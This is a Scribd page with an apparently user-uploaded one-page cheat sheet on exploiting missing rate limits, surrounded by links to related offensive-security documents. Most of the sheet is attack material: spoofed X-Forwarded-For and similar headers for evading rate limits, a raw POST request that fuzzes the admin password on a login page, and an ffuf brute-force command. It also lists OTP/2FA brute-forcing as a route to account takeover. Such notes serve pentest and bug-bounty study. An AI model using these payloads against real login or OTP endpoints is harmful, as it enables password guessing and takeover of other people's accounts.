Rate Limit

The document outlines various areas where there is no rate limit implemented, such as login pages and password resets, which could lead to account takeovers. It also details methods to bypass rate limits by manipulating HTTP headers. Additionally, it includes an example of a POST request to exploit these vulnerabilities.

Uploaded by

francismizo77

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

4 views1 page

Rate Limit

Uploaded by

francismizo77

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as TXT, PDF, TXT or read online on Scribd

You are on page 1/ 1

rate limit

1- no rate limit on login page

2- no rate limit on internal password
3- no rate limit on sending reset password link
4- no rate limit on OTP or 2FA => account takeover
5- no rate limit on contact us page
6- no rate limit on comments
7- no rate limit on reports of comments
8- no rate limit on port 22

------------
bypass rate limit by adding headers
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Origination-IP: 127.0.0.1 or 0.0.0.0
X-Fowarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
------------------------------------------
POST /login.php HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-Origination-IP: 127.0.0.1 or 0.0.0.0
X-Fowarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

username=admin&password=$fuzz$
-------------------------------------------
429 => 403
bypass rate limit

ffuf -u https://example.com -w wordlist.txt --data "username=admin&password=FUZZ"

-H "X-Forwarded-For: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1"

401 & 403 Bypass CheatSheet For Ethical Hacker - Codelivly
No ratings yet
401 & 403 Bypass CheatSheet For Ethical Hacker - Codelivly
9 pages
Box To Complete
No ratings yet
Box To Complete
3 pages
WebHacking All Bugs
No ratings yet
WebHacking All Bugs
84 pages
Bypassing 2FA: Methods and Techniques
No ratings yet
Bypassing 2FA: Methods and Techniques
20 pages
BSCP Tracker
No ratings yet
BSCP Tracker
207 pages
Web Pentest Checklist
No ratings yet
Web Pentest Checklist
76 pages
Authorization Response
No ratings yet
Authorization Response
70 pages
Web Security Exploitation Guide
No ratings yet
Web Security Exploitation Guide
9 pages
BSCP5
No ratings yet
BSCP5
88 pages
2FA Bypass
No ratings yet
2FA Bypass
6 pages
Web Security Exploits Guide
100% (2)
Web Security Exploits Guide
12 pages
?admin Panel Bypass Checklist?
100% (2)
?admin Panel Bypass Checklist?
3 pages
Tips Notes
No ratings yet
Tips Notes
5 pages
Web App Security Testing Guide
100% (1)
Web App Security Testing Guide
13 pages
BSCP Exam 1
No ratings yet
BSCP Exam 1
4 pages
The Config Guide
No ratings yet
The Config Guide
21 pages
The Art of Authentication Bypass
No ratings yet
The Art of Authentication Bypass
49 pages
Security-Exploiting Session Vulnerabilities
No ratings yet
Security-Exploiting Session Vulnerabilities
2 pages
403 Bypass
No ratings yet
403 Bypass
6 pages
LogIn Page
No ratings yet
LogIn Page
39 pages
XSS
No ratings yet
XSS
2 pages
Ex 1234
No ratings yet
Ex 1234
5 pages
Bbgma - Web 007-02-2fa-Otp
No ratings yet
Bbgma - Web 007-02-2fa-Otp
29 pages
AnswerSheet Part1
No ratings yet
AnswerSheet Part1
67 pages
Ass5 12
No ratings yet
Ass5 12
3 pages
EWPTXv2 Labs
No ratings yet
EWPTXv2 Labs
351 pages
Final Notes Web
No ratings yet
Final Notes Web
2 pages
No Rate Limit Attack Guide
No ratings yet
No Rate Limit Attack Guide
3 pages
From - Telstra Security Operations
No ratings yet
From - Telstra Security Operations
4 pages
Auto BLS Login Script for Errors
No ratings yet
Auto BLS Login Script for Errors
2 pages
Nouveau Document Texte
No ratings yet
Nouveau Document Texte
1 page
Advanced CSRF 1
No ratings yet
Advanced CSRF 1
33 pages
Burp Update
No ratings yet
Burp Update
26 pages
Interaction File URL
No ratings yet
Interaction File URL
61 pages
Nahamcon Oauth Secrets2
No ratings yet
Nahamcon Oauth Secrets2
45 pages
BSCP3
No ratings yet
BSCP3
13 pages
Ass5 14
No ratings yet
Ass5 14
2 pages
Exploit
No ratings yet
Exploit
4 pages
Asdfqt
No ratings yet
Asdfqt
3 pages
Bug Bounty Tips for Hackers
No ratings yet
Bug Bounty Tips for Hackers
28 pages
Web A
No ratings yet
Web A
8 pages
Unauthorized Url Redirect
No ratings yet
Unauthorized Url Redirect
5 pages
Web Protocols & Storage Guide
No ratings yet
Web Protocols & Storage Guide
3 pages
Cryptographic - Digital Signature - SRT
No ratings yet
Cryptographic - Digital Signature - SRT
9 pages
CSRF Attack Guide for DVWA & BWAPP
No ratings yet
CSRF Attack Guide for DVWA & BWAPP
5 pages
Lab 1 Observing HTTP Traffic Using BurpSuite-maryam Rashed
No ratings yet
Lab 1 Observing HTTP Traffic Using BurpSuite-maryam Rashed
7 pages
Junior Penetration Tester
No ratings yet
Junior Penetration Tester
17 pages
Web Programming With Python and Javascript
No ratings yet
Web Programming With Python and Javascript
66 pages
Web Programming: With Python and Javascript
No ratings yet
Web Programming: With Python and Javascript
102 pages
My Methodology To Beryone, My Name Is Ahmed Farag
No ratings yet
My Methodology To Beryone, My Name Is Ahmed Farag
10 pages
SSRF Bible. Cheatsheet: @wallarm @d0znpp
No ratings yet
SSRF Bible. Cheatsheet: @wallarm @d0znpp
23 pages
Web Application Penetration Testing Checklist: More Than 200 Custom Testcases Prepared By: Tushar Verma Recon Phase
No ratings yet
Web Application Penetration Testing Checklist: More Than 200 Custom Testcases Prepared By: Tushar Verma Recon Phase
13 pages
OTP Rate Limiting Vulnerability
No ratings yet
OTP Rate Limiting Vulnerability
5 pages

Rate Limit

Uploaded by

Rate Limit

Uploaded by

rate limit

1- no rate limit on login page

ffuf -u https://example.com -w wordlist.txt --data "username=admin&password=FUZZ"

You might also like